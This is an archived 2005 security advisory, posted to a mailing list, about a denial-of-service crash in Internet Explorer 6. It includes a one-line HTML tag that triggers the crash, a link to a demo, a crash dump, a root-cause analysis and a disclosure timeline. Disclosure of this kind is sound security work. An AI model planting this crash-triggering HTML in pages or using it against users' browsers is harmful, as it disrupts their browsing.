<<< Date Index >>>     <<< Thread Index >>>

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ---------------------------------------------------
| BuHa Security-Advisory #4     |    Dec 24th, 2005 |
 ---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Low (DoS - Null Pointer Dereference)   |
 ---------------------------------------------------
 
o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d663471
===================

Following HTML code forces M$ IE 6 to crash:
> <table datasrc=".">

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1128216821765-7d663471.html

These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01293b38 ecx=01293b20 edx=7d74ede0 esi=01293b20
edi=00000000 eip=7d663471 esp=0012e89c ebp=0012e89c
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00000246

        7d663469 8bff             mov     edi,edi
        7d66346b 55               push    ebp
        7d66346c 8bec             mov     ebp,esp
        7d66346e 8b4110           mov     eax,[ecx+0x10]
FAULT ->7d663471 66833823         cmp     word ptr [eax],0x23   
ds:0023:00000000=????
        7d663475 7405             jz      mshtml+0x1b347c (7d66347c)
        7d663477 33c0             xor     eax,eax
        7d663479 40               inc     eax
        7d66347a eb1e             jmp     mshtml+0x1b349a (7d66349a)
        7d66347c ff7508           push    dword ptr [ebp+0x8]
        7d66347f 8b09             mov     ecx,[ecx]
        7d663481 83c002           add     eax,0x2
        7d663484 50               push    eax
        7d663485 e8466cebff       call    mshtml+0x6a0d0 (7d51a0d0)
        7d66348a 8bc8             mov     ecx,eax
        7d66348c e8ad44fbff     call mshtml!CreateHTMLPropertyPage+0x2432c 
(7d61793e)
        7d663491 33c9             xor     ecx,ecx
        7d663493 85c0             test    eax,eax
        7d663495 0f9cc1           setl    cl
        7d663498 8bc1             mov     eax,ecx
        7d66349a 5d               pop     ebp
        7d66349b c20400           ret     0x4

The access violation results in a null pointer dereference and is not 
exploitable. 

M$ IE parses the attribute value of 'datasrc' ("[n].[m]") in the 
following way:
* Split the attribute value in two parts
* Compare the first char of [n] with 0x23 ('#')

The reason for the crash is that the 0 byte long [n] (no memory is allocated 
for this string) is used without any validation.

For example:
> char *t = NULL;
>
> if(t[0] = 0x23)


o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:
> M$ IE 6.0  - Windoze XP Pro SP2
> M$ IE 6.0  - Windoze 2k SP4
> M$ IE 5.5  - Windoze XP Pro SP2
> M$ IE 5.01 - Windoze XP Pro SP2


o Disclosure Timeline:
=====================

10 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==========

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=========

Christian Deneke <bugtraq@xxxxxxxxxx>

- --

Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-1.txt 

-----BEGIN PGP SIGNATURE-----
Version: n/a                   
Comment: http://morph3us.org/

iD8DBQFDrdnDkCo6/ctnOpYRAvLLAKCbjmd+eqqRXDbtfjqNj4ALvJz2aACeM2ZS
i7x/RPte39BmMXHPNZUn2iU=
=6FEe
-----END PGP SIGNATURE-----